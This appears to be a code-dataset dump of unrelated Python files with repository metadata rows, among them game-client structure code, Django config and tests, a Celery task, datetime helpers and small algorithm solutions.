self.state = None
self.timer = None
self.turrets = []
self.modules = {}
def Assemble(self):
self.SetStaticRotation()
self.SetupSharedAmbientAudio()
self.OnSlimItemUpdated(self.typeData.get('slimItem'))
def OnSlimItemUpdated(self, item):
if item is None or self.unloaded:
return
if item.state and (item.state != self.state or item.timer != self.timer):
if item.timer and item.state == structures.STATE_ANCHORING:
start, end, paused = item.timer
duration = (end - start) / const.SEC
elapsed = duration - max(end - blue.os.GetWallclockTime(), 0L) / const.SEC
else:
duration = 0
elapsed = 0
self.state = item.state
self.timer = item.timer
self.GotoState(STATES[self.state], duration, elapsed)
if set([ i[0] for i in item.modules or [] if evetypes.GetGraphicID(i[1]) is not None ]) != set(self.modules.keys()):
uthread.new(self.ReloadHardpoints)
def OnDamageState(self, damageState):
BuildableStructure.OnDamageState(self, damageState)
if self.model is not None and damageState is not None:
states = [ (d if d is not None else 0.0) for d in damageState ]
self.model.SetImpactDamageState(states[0], states[1], states[2], False)
def GotoState(self, state, totalTime = 0, elapsedTime = 0):
if state == STATE_CONSTRUCT:
uthread.new(self.BuildStructure, float(totalTime), float(elapsedTime))
elif state == STATE_DECONSTRUCT:
uthread.new(self.TearDownStructure, float(totalTime), float(elapsedTime))
else:
uthread.new(self.LoadModelWithState, state)
def LoadModelWithState(self, newState):
if self.model is None:
self.LoadModel()
self.TriggerAnimation(newState)
self.FitHardpoints()
self.StartStructureLoopAnimation()
def LoadModel(self, fileName = None, loadedModel = None):
self.model = self.GetStructureModel()
self.SetAnimationSequencer(self.model)
self.NotifyModelLoaded()
def ReloadHardpoints(self):
self.UnfitHardpoints()
self.FitHardpoints()
def UnfitHardpoints(self):
if not self.fitted:
return
self.logger.debug('Unfitting hardpoints')
newModules = {}
for key, val in self.modules.iteritems():
if val not in self.turrets:
newModules[key] = val
self.modules = newModules
del self.turrets[:]
self.fitted = False
def FitHardpoints(self, blocking = False):
if self.fitted:
return
if self.model is None:
self.logger.warning('FitHardpoints - No model')
return
self.logger.debug('Fitting hardpoints')
self.fitted = True
newTurretSetDict = TurretSet.FitTurrets(self.id, self.model, self.typeData.get('sofFactionName', None))
self.turrets = []
for key, val in newTurretSetDict.iteritems():
self.modules[key] = val
self.turrets.append(val)
def LookAtMe(self):
if not self.model:
return
if not self.fitted:
self.FitHardpoints()
def StopStructureLoopAnimation(self):
animationUpdater = self.GetStructureModel().animationUpdater
if animationUpdater is not None:
animationUpdater.PlayLayerAnimation('TrackMaskLayer1', 'Layer1Loop', False, 1, 0, 1, True)
def StartStructureLoopAnimation(self):
animationUpdater = self.GetStructureModel().animationUpdater
if animationUpdater is not None:
animationUpdater.PlayLayerAnimation('TrackMaskLayer1', 'Layer1Loop', False, 0, 0, 1, True)
def BuildStructure(self, anchoringTime, elapsedTime):
self.LoadUnLoadedModels()
self.logger.debug('Structure: BuildStructure %s', self.GetTypeID())
self.PreBuildingSteps()
delay = int((anchoringTime - elapsedTime) * 1000)
uthread.new(self._EndStructureBuild, delay)
self.TriggerAnimation(STATE_CONSTRUCT, curveLength=anchoringTime, elapsedTime=elapsedTime)
def _EndStructureBuild(self, delay):
blue.pyos.synchro.SleepSim(delay)
if self.released or self.exploded:
return
self.StartStructureLoopAnimation()
self.PostBuildingSteps(True)
self.LoadModel()
def TearDownStructure(self, unanchoringTime, elapsedTime):
self.LoadUnLoadedModels()
self.logger.debug('Structure: TearDownStructure %s', self.GetTypeID())
self.StopStructureLoopAnimation()
self.PreBuildingSteps()
delay = int((unanchoringTime - elapsedTime) * 1000)
uthread.new(self._EndStructureTearDown, delay)
self.TriggerAnimation(STATE_DECONSTRUCT, curveLength=unanchoringTime, elapsedTime=elapsedTime)
def _EndStructureTearDown(self, delay):
blue.pyos.synchro.SleepSim(delay)
if self.released or self.exploded:
return
self.PostBuildingSteps(False)
self.model = self.GetNanoContainerModel()
def Explode(self, explosionURL = None, scaling = 1.0, managed = False, delay = 0.0):
if SpaceObjectExplosionManager.USE_EXPLOSION_BUCKETS:
self.logger.debug('Exploding with explosion bucket')
scene = sm.GetService('space').GetScene()
wreckSwitchTime, _, __ = SpaceObjectExplosionManager.ExplodeBucketForBall(self, scene)
return wreckSwitchTime
explosionURL, (delay, _) = self.GetExplosionInfo()
explosionLocatorSets = None
if hasattr(self.model, 'locatorSets'):
explosionLocatorSets = self.model.locatorSets.FindByName('explosions')
rotation = self.GetStaticRotation()
self.explosionManager.PlayClientSideExplosionBall(explosionURL, (self.x, self.y, self.z), rotation, explosionLocatorSets)
return delay
| [
"[email protected]"
] | |
d52e595dc32e6ffdf0abd0ec6fc0f348ce9ada5e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03089/s662353627.py | 14c606722f6e0774d8c3d2625e893ec714620f0c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | n = int(input())
b = list(map(int , input().split()))
def f(c):
for i in reversed(range(len(c))):
if c[i] == i+1:
return (c[i], c[:i] + c[i+1:])
return (-1, c)
ans = []
for i in range(n):
(a, b) = f(b)
if a == -1:
print(-1)
exit()
ans.append(a)
#print(ans, b)
print('\n'.join(map(str, reversed(ans))))
| [
"[email protected]"
] | |
7249037b709c0aa0c8542843b0645547e32df6f8 | a08492c20c6bda0282170fee569f3cd199876ec7 | /scr/return_directories.py | 6e090bc090e123ede17864f4f68be58e20f41193 | [] | no_license | GregoryREvans/evans | a7744011ccd2395e15d325092e85a31379717e6d | 7b0f7caa55e1c4b2a733b9b6fc42230a43313fb6 | refs/heads/master | 2023-08-31T04:29:31.296222 | 2023-08-21T02:32:12 | 2023-08-21T02:32:12 | 143,075,881 | 4 | 1 | null | 2021-06-06T07:27:38 | 2018-07-31T22:22:06 | Python | UTF-8 | Python | false | false | 425 | py | import pathlib
def return_directories(
p="/Users/gregoryevans/Scores",
ignores=("_archive", ".mypy_cache", "_squonk", "akasha", "stirrings_still"),
):
build_path = pathlib.Path(p)
returns = []
for score in sorted(build_path.iterdir()):
if not score.is_dir():
continue
if score.name in ignores:
continue
else:
returns.append(score)
    return returns
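# Minimal usage sketch (the default path above is only an assumption):
# for score in return_directories():
#     print(score.name)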
| [
"[email protected]"
] | |
c37631b47a0b6af83326403ee829649b804d3d58 | f9697acaab8a8ee05ccbd5368f6c72ad8c5dd485 | /backend/test_23115/wsgi.py | d1ce4e85722e439b0c888cf764cf31d84dc3e907 | [] | no_license | crowdbotics-apps/test-23115 | f6fd5b199d5586aed78f0a9844062c83ee0ab574 | c6e7f7cf32130aa45fb31bba3fa67ad8e0346e82 | refs/heads/master | 2023-01-24T22:13:58.393735 | 2020-12-01T16:37:00 | 2020-12-01T16:37:00 | 317,603,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
WSGI config for test_23115 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_23115.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
16e7a75e20aad03573da75c844a7329f52d68fe5 | 32c56293475f49c6dd1b0f1334756b5ad8763da9 | /google-cloud-sdk/lib/surface/container/node_pools/__init__.py | 245eda35f54a0e9605d06f2abed352e8ec9f670c | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] | permissive | bopopescu/socialliteapp | b9041f17f8724ee86f2ecc6e2e45b8ff6a44b494 | 85bb264e273568b5a0408f733b403c56373e2508 | refs/heads/master | 2022-11-20T03:01:47.654498 | 2020-02-01T20:29:43 | 2020-02-01T20:29:43 | 282,403,750 | 0 | 0 | MIT | 2020-07-25T08:31:59 | 2020-07-25T08:31:59 | null | UTF-8 | Python | false | false | 1,982 | py | # -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The command group for cloud container operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.container import container_command_util
from googlecloudsdk.command_lib.container import flags
from googlecloudsdk.command_lib.container import messages
from googlecloudsdk.core import log
class NodePools(base.Group):
"""Create and delete operations for Google Kubernetes Engine node pools."""
@staticmethod
def Args(parser):
"""Add arguments to the parser.
Args:
parser: argparse.ArgumentParser, This is a standard argparser parser with
which you can register arguments. See the public argparse documentation
for its capabilities.
"""
flags.AddZoneAndRegionFlags(parser)
def Filter(self, context, args):
"""Modify the context that will be given to this group's commands when run.
Args:
context: {str:object}, A set of key-value pairs that can be used for
common initialization among commands.
args: argparse.Namespace: The same namespace given to the corresponding
.Run() invocation.
Returns:
The refined command context.
"""
context['location_get'] = container_command_util.GetZoneOrRegion
return context
| [
"[email protected]"
] | |
b2617614628599bfb4b9f00487c546159e392f55 | e663909cec3c4eda12bb705fce9a6dc901bb7d88 | /爬虫/day12 celery/案例/定时任务的使用/tasks.py | 4c40c0aff2ac3b0e98d732cc5040744ae7ff06b3 | [] | no_license | 1284753334/learning2 | a03f293965a652883503cae420d8b1ad11ae6661 | f2fcb3c856656cc8427768b41add3ee083487592 | refs/heads/master | 2023-01-30T23:18:26.951210 | 2020-12-20T15:57:18 | 2020-12-20T15:57:18 | 315,065,804 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | from celery import Celery
from celery import Task
app = Celery('tasks', backend='redis://:[email protected]:6379/2',
broker='redis://:[email protected]:6379/2')
app.config_from_object('celery_config')
@app.task(bind=True)
def period_task(self):
print('period task done: {0}'.format(self.request.id))
# Start the worker:
# celery -A tasks worker -l info -P eventlet
# Start the beat scheduler (e.g. via a .bat script); due tasks then run automatically:
# celery -A tasks beat
| [
"[email protected]"
] | |
e50c5b58cede70ff4ee4e99a6462a2a0bfa66ebb | 1c390cd4fd3605046914767485b49a929198b470 | /leetcode/number-of-ways-to-reorder-array-to-get-same-bst.py | 20d18c287b19a6543b31a2e3550bee7c771d1829 | [] | no_license | wwwwodddd/Zukunft | f87fe736b53506f69ab18db674311dd60de04a43 | 03ffffee9a76e99f6e00bba6dbae91abc6994a34 | refs/heads/master | 2023-01-24T06:14:35.691292 | 2023-01-21T15:42:32 | 2023-01-21T15:42:32 | 163,685,977 | 7 | 8 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | class Solution:
def numOfWays(self, a: List[int]) -> int:
z = factorial(len(a))
def F(a):
nonlocal z
if a:
z //= len(a)
F([i for i in a if i < a[0]])
F([i for i in a if i > a[0]])
F(a)
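        # Note (assumption): the number of insertion orders that rebuild the
        # same BST is n! divided by the product of all subtree sizes, so z is
        # divided by len(a) at each split; the -1 excludes the given order.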
        return (z - 1) % 1000000007
| [
"[email protected]"
] | |
d84008737b9bd1f9dcb63e284d0f2f7a674116bc | d880b55d45726a9b9b12d24b059769350eeb6fb6 | /app/tests/test_eventactions.py | 0d49b3c282c0d5aaafc4cee1e7dc907315c8b1b1 | [
"Apache-2.0"
] | permissive | twatchy/cito_engine | 261a0bbf0dbdf1fe8cca19f598972307bc7df1c7 | a62dce3c76567dd36b7efcaa70e03728b335f44e | refs/heads/master | 2020-04-21T11:36:25.187256 | 2016-11-01T03:37:13 | 2016-11-01T03:37:13 | 169,531,529 | 0 | 0 | Apache-2.0 | 2019-02-07T06:57:48 | 2019-02-07T06:57:43 | Python | UTF-8 | Python | false | false | 4,329 | py | """Copyright 2014 Cyrus Dasadia
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from time import time
from mock import patch, call
from django.test import TestCase
from cito_engine.models import Incident, IncidentLog, EventActionCounter
from cito_engine.poller.event_poller import EventPoller
from . import factories
class TestEventActions(TestCase):
"""
    X = 2, Y = 100 (threshold_count = 2 within threshold_timer = 100 s)
    Case 1
    * 1st incident at time T
    * 2nd at T+10, 3rd at T+11, 4th at T+51
    * Assert we have one single incident, 4 logs, and the event action executed once
    * 5th incident occurs at T+101 (outside the 100 s window)
    * Assert counters are reset
    * 6th incident occurs at T+121
* Assert event action is executed for the second time
"""
def setUp(self):
self.event = factories.EventFactory.create()
self.eventaction = factories.EventActionFactory.create(event=self.event,threshold_count=2, threshold_timer=100)
@patch('cito_engine.actions.incidents.requests')
def test__single_event_action_execution(self, mock_requests):
T = int(time())
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (self.event.id, T)
eventpoller = EventPoller()
self.assertTrue(eventpoller.parse_message(raw_incident))
incident = Incident.objects.filter()[0]
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertFalse(eacounter.is_triggered)
# 2nd incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T+10)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
#3rd incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 11)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
# 4th incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 51)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
#We should have one incident and 4 incident logs
self.assertEqual(Incident.objects.count(), 1)
self.assertEqual(IncidentLog.objects.count(), 4)
# Assert we only execute plugin once
self.assertEqual(mock_requests.post.call_count, 1)
# 5th incident after time window
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 101)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertFalse(eacounter.is_triggered)
# Assert we did not execute plugin yet
self.assertEqual(mock_requests.post.call_count, 1)
# 6th incident after time window
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 121)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
# Assert event action occurred for the second time
self.assertEqual(mock_requests.post.call_count, 2)
    # TODO: add tests covering the remaining use cases described in the class docstring
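    # One possible shape for such a test, sketched below; it reuses the factories
    # and JSON payload from the test above, and the reset-window expectations are
    # assumptions drawn from the 5th-incident assertions:
    @patch('cito_engine.actions.incidents.requests')
    def test__counter_resets_outside_window(self, mock_requests):
        """Two incidents farther apart than threshold_timer must not trigger."""
        T = int(time())
        eventpoller = EventPoller()
        for ts in (T, T + 101):  # second incident falls outside the 100 s window
            raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (self.event.id, ts)
            self.assertTrue(eventpoller.parse_message(raw_incident))
        eacounter = EventActionCounter.objects.get(incident=Incident.objects.filter()[0])
        self.assertFalse(eacounter.is_triggered)
        # No trigger means the action plugin was never called.
        self.assertEqual(mock_requests.post.call_count, 0)
| [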
"[email protected]"
] | |
97881fac8f0fc31d32cb2dcfab394222d5961334 | 9bd6caf9c42ac67dfcb120af272d8e65d8f6a9f6 | /venv/bin/python-config | 473844071904928c2233c7ec06d5e3c88290dd42 | [] | no_license | haedal-with-knu/KNUstudents | f6da8e8c112af317addeb1cccaca9f3bfa6bcacc | 6fc88e5699cc27fbf9f7b6437d84b249e450232e | refs/heads/master | 2020-06-30T13:25:20.994394 | 2019-10-13T14:58:36 | 2019-10-13T14:58:36 | 200,837,311 | 1 | 6 | null | 2019-10-13T14:06:47 | 2019-08-06T11:24:16 | CSS | UTF-8 | Python | false | false | 2,360 | #!/Users/kangminchoi/haedal/KNUstudents/venv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
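# Example session (illustrative only; actual paths and versions vary per install):
#   $ python-config --includes
#   -I/usr/include/python3.8 -I/usr/include/python3.8
#   $ python-config --ldflags
#   -L/usr/lib/python3.8/config-3.8-x86_64-linux-gnu -lpython3.8 -lpthread -ldl -lutil -lm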
| [
"[email protected]"
] | ||
0cc996327080cef74cacd4ca115b5b1872936fa0 | 0e78b2df0fb93afc62684dece8ac05b700570248 | /BOJ/10833.py | 06f397ce5fd59451cdaa7e04768b716105b35bc1 | [] | no_license | ajy720/Algorithm | f1e2301327db09667ba011bc317c8f380707c25c | b141538802e9056f154ab91c816ad29500505f34 | refs/heads/master | 2022-05-06T21:37:05.780170 | 2022-04-23T09:25:52 | 2022-04-23T09:25:52 | 200,335,390 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | ans = 0
for _ in ' ' * int(input()):  # iterate N times (over a length-N string)
    a, b = map(int, input().split())
    ans += b % a  # remainder after dividing b evenly by a
print(ans)
| [
"[email protected]"
] | |
f6f725cc17fc1faf7eac0a28e5e4359dcb58b5a7 | 3c94e55a1f2a41bdebd7a174c84c560283754b92 | /coffeecoin_admin/wsgi.py | 86e4bf45b6775b5ca4142c8a61f54a6eb322d346 | [] | no_license | coinmenace/coffeecoin_admin | 2542bca5f186b117a4d2b90cdde7cdbfa7ad6f3b | 65ceaa4ffba319fac3286388b572d19cde646bb0 | refs/heads/master | 2020-03-27T04:15:57.482384 | 2018-08-24T01:22:39 | 2018-08-24T01:22:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | """
WSGI config for coffeecoin_admin project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "coffeecoin_admin.settings")
application = get_wsgi_application()
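# A typical way to serve this module (a sketch; the server choice and bind
# address are assumptions, not part of this project):
#   gunicorn coffeecoin_admin.wsgi:application --bind 0.0.0.0:8000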
| [
"[email protected]"
] | |
20691830fbf91a5caae39677d6ec0024590b522a | 72b00923d4aa11891f4a3038324c8952572cc4b2 | /python/datastruct/dd_oob/pgm07_28.txt | c1f7f8084c1a8e16b2bdb107bdc35ca04776988a | [] | no_license | taowuwen/codec | 3698110a09a770407e8fb631e21d86ba5a885cd5 | d92933b07f21dae950160a91bb361fa187e26cd2 | refs/heads/master | 2022-03-17T07:43:55.574505 | 2022-03-10T05:20:44 | 2022-03-10T05:20:44 | 87,379,261 | 0 | 0 | null | 2019-03-25T15:40:27 | 2017-04-06T02:50:54 | C | UTF-8 | Python | false | false | 722 | txt | #
# This file contains the Python code from Program 7.28 of
# "Data Structures and Algorithms
# with Object-Oriented Design Patterns in Python"
# by Bruno R. Preiss.
#
# Copyright (c) 2003 by Bruno R. Preiss, P.Eng. All rights reserved.
#
# http://www.brpreiss.com/books/opus7/programs/pgm07_28.txt
#
class SortedListAsArray(OrderedListAsArray, SortedList):
def withdraw(self, obj):
if self._count == 0:
raise ContainerEmpty
offset = self.findOffset(obj)
if offset < 0:
raise KeyError
        i = offset
        # Close the gap: shift every later element one slot to the left.
        # (The loop must stop at count - 1; otherwise array[count] is read.)
        while i < self._count - 1:
            self._array[i] = self._array[i + 1]
            i += 1
        self._array[i] = None
        self._count -= 1
# ...
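# The same left-shift deletion as a standalone sketch over a plain Python list
# (illustrative only; the book's Array and list classes are defined elsewhere):
def withdraw_at(arr, count, offset):
    """Remove arr[offset] from the first count slots by shifting left."""
    for i in range(offset, count - 1):
        arr[i] = arr[i + 1]
    arr[count - 1] = None  # clear the vacated slot
    return count - 1       # new logical element count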
| [
"[email protected]"
] | |
2a0f864a90d2c9af31adaade203406309f66c9d1 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_333/ch77_2020_04_13_15_29_15_904054.py | a10778292bfbe71d82aaf9be4a6d5a915023fc82 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | import math
def calcula_tempo(dicionario):
    # Despite the name, the argument is an iterable of (name, acceleration) pairs.
    nome_tempo = {}
    for nome_e_aceleracao in dicionario:
        nome = nome_e_aceleracao[0]
        aceleracao = nome_e_aceleracao[1]
        tempo = aceleracao_tempo(int(aceleracao))
        nome_tempo[nome] = tempo
    return nome_tempo

def aceleracao_tempo(a):
    # Time to cover 100 m from rest: s = a*t**2/2  =>  t = sqrt(2*100/a) = sqrt(200/a)
    t = math.sqrt(200 / a)
    return t
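# Illustrative call (assumed inputs; the values follow from t = sqrt(200/a)):
#   calcula_tempo([("Ana", 2), ("Bia", 8)])  ->  {'Ana': 10.0, 'Bia': 5.0}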
| [
"[email protected]"
] | |
8ea08f6a84070e59475e3de8786df6296cbdddd9 | a989ff888d86eaad7d3572993d89af17bb29c7ec | /kartverket_stormsurge/helper/datetimes.py | 981e44efed210c6a738f00d83a0f60092b15ec65 | [
"MIT"
] | permissive | jerabaul29/kartverket_storm_surge_data | 8f873232a3aff92f07a73220e51f8385278a029a | 9a35492550ec8b3f4c0b7f1d17bf3bb4776f2c49 | refs/heads/master | 2023-01-31T02:17:34.834755 | 2020-12-15T10:30:54 | 2020-12-15T10:30:54 | 287,529,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,229 | py | import datetime
import pytz
from kartverket_stormsurge.helper.raise_assert import ras
def assert_is_utc_datetime(date_in):
"""Assert that date_in is an UTC datetime."""
ras(isinstance(date_in, datetime.datetime))
if not (date_in.tzinfo == pytz.utc or
date_in.tzinfo == datetime.timezone.utc):
raise Exception("not utc!")
if date_in.tzinfo == pytz.utc:
print("prefer using datetime.timezone.utc to pytz.utc")
def assert_10min_multiple(date_in):
"""Assert that date_in is a datetime that is a
multiple of 10 minutes.
"""
ras(isinstance(date_in, datetime.datetime))
ras(date_in.second == 0)
ras((date_in.minute % 10) == 0)
ras(date_in.microsecond == 0)
def datetime_range(datetime_start, datetime_end, step_timedelta):
"""Yield a datetime range, in the range [datetime_start; datetime_end[,
with step step_timedelta."""
assert_is_utc_datetime(datetime_start)
assert_is_utc_datetime(datetime_end)
ras(isinstance(step_timedelta, datetime.timedelta))
ras(datetime_start < datetime_end)
ras(step_timedelta > datetime.timedelta(0))
crrt_time = datetime_start
yield crrt_time
while True:
crrt_time += step_timedelta
if crrt_time < datetime_end:
yield crrt_time
else:
break
def datetime_segments(datetime_start, datetime_end, step_timedelta):
"""Generate a succession of segments, that cover [datetime_start; datetime_end].
The segments will have length step_timedelta, except possibly the last segment
that may be shorter."""
assert_is_utc_datetime(datetime_start)
assert_is_utc_datetime(datetime_end)
ras(isinstance(step_timedelta, datetime.timedelta))
ras(datetime_start < datetime_end)
ras(step_timedelta > datetime.timedelta(0))
crrt_segment_start = datetime_start
crrt_segment_end = crrt_segment_start + step_timedelta
while True:
if crrt_segment_end >= datetime_end:
yield (crrt_segment_start, datetime_end)
break
else:
yield (crrt_segment_start, crrt_segment_end)
crrt_segment_start += step_timedelta
crrt_segment_end += step_timedelta
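# Illustrative use (assumed values; both helpers require tz-aware UTC datetimes):
#   start = datetime.datetime(2020, 1, 1, tzinfo=datetime.timezone.utc)
#   end = start + datetime.timedelta(minutes=30)
#   list(datetime_range(start, end, datetime.timedelta(minutes=10)))
#       -> times 00:00, 00:10, 00:20 (end excluded)
#   list(datetime_segments(start, end, datetime.timedelta(minutes=20)))
#       -> segments (00:00, 00:20) and (00:20, 00:30) (last one shortened)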
| [
"[email protected]"
] | |
3f1602c001f4b70e038794a08ba4c725871c4198 | 040bd1995190e858299fcdd716bd986aa0664d13 | /Trees and Graphs/MaxiumumDepthOfBinaryTree.py | 04b51d71defc1958be86b73fc93dbac3a0196e5e | [] | no_license | PravinSelva5/LeetCode_Grind | 7c568d68231ff34332d756237e79ca8d19cebfec | aa5fb8eb12b1e1903cb0cb688dc41f959e4caf6a | refs/heads/master | 2023-02-08T13:05:10.355867 | 2021-01-05T02:55:29 | 2021-01-05T02:55:29 | 271,690,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | '''
Given the root of a binary tree, return its maximum depth.
A binary tree's maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node
--------------------
RESULTS
--------------------
Time Complexity: O(N)
Space Complexity: O(H), H represents the height of the tree
Runtime: 32 ms, faster than 97.68% of Python3 online submissions for Maximum Depth of Binary Tree.
Memory Usage: 16.2 MB, less than 33.21% of Python3 online submissions for Maximum Depth of Binary Tree.
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def maxDepth(self, root: TreeNode) -> int:
if root == None:
return 0
if root.left == None and root.right == None:
return 1
left = self.maxDepth(root.left)
right = self.maxDepth(root.right)
        return max(left, right) + 1
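
# Quick sanity check (a sketch; TreeNode as in the commented stub above):
#   root = TreeNode(1, TreeNode(2, TreeNode(4)), TreeNode(3))
#   Solution().maxDepth(root)  ->  3   (longest path: 1 -> 2 -> 4)
| [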
"[email protected]"
] | |
633981c5580abc6b32852ac0098516780d0c8861 | d9563f113fa4dcbf6dadb5ea186d69839f372119 | /pedidos/migrations/0004_auto_20191129_1821.py | 08c3d750eba80e0bc31f5b96aa8c4b9131fc203e | [] | no_license | CarlosSanz81/serv | 717eefea1ead9325472cef165f2326a14dd355cd | dd3cb5b022b8b939ff6ea502b8335c257d057abb | refs/heads/master | 2020-09-16T03:41:16.306550 | 2019-12-05T12:41:01 | 2019-12-05T12:41:01 | 223,640,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | # Generated by Django 2.2.7 on 2019-11-29 17:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pedidos', '0003_archivo'),
]
operations = [
migrations.AlterField(
model_name='archivo',
name='nombre',
field=models.FileField(blank=True, null=True, upload_to='./media/'),
),
]
| [
"[email protected]"
] | |
c92c8e96486ba05e3cf7c3d52836a06125a9a899 | 3d0ae7c8693463faa11bacad8e6ea9d0d70b9eb1 | /nlp/3rdParty/orange/orange/OrangeWidgets/Prototypes/OWPreprocessing.py | 168864c2174450afb47cb0f7ac89fb6b1324b927 | [] | no_license | stefie10/slu_hri | a76f79094bd1740676fec5d889411ba3b1d9dc26 | 50753379953e1ff822162eeab094cffe4a30f3e1 | refs/heads/master | 2022-12-14T01:07:51.522258 | 2020-08-31T00:50:12 | 2020-08-31T00:50:12 | 291,386,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,742 | py | """
<name>Preprocessing</name>
